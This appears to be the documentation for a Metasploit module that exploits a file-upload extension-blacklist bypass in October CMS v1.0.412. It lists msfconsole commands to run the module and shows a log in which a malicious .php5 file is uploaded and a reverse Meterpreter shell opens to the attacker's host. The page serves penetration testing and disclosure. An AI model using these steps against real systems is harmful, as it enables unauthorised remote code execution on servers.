## Description

  An authenticated user with permission to upload and manage media contents can
  upload various files on the server. The application prevents the user from
  uploading PHP code by checking the file extension. It uses blacklist based
  approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
  Definitions.php:blockedExtensions().

## Vulnerable Software

  October CMS v1.0.412 (build 412)
  https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/october_upload_bypass_exec```
  4. Do: ```set RHOSTS <ip>``
  5. Do: ```set USERNAME <user>```
  6. Do: ```set PASSWORD <pass>```
  7. You should get a shell.

## Verification Steps

  ```
  msf5 > use exploit/multi/http/october_upload_bypass_exec
  msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16
  rhosts => 10.10.10.16
  msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true
  verbose => true
  msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8
  lhost => 10.10.14.8
  msf5 exploit(multi/http/october_upload_bypass_exec) > run 

  [*] Started reverse TCP handler on 10.10.14.8:4444 
  [+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP
  [+] Session Key for login : uVNSZ2YRUm39cf8kqJcWV0qr9xhqq9krCYHeVI6m
  [*] Trying to Login ......
  [+] Authentication successful: admin:admin
  [*] Trying to upload malicious WLMVDKmVpCX.php5 file ....
  [*] Sending stage (38247 bytes) to 10.10.10.16
  [*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.16:54124) at 2019-09-03 12:19:20 +0530
  [+] Deleted WLMVDKmVpCX.php5

  meterpreter > sysinfo 
  Computer    : october
  OS          : Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686
  Meterpreter : php/linux
  meterpreter > 
  ```
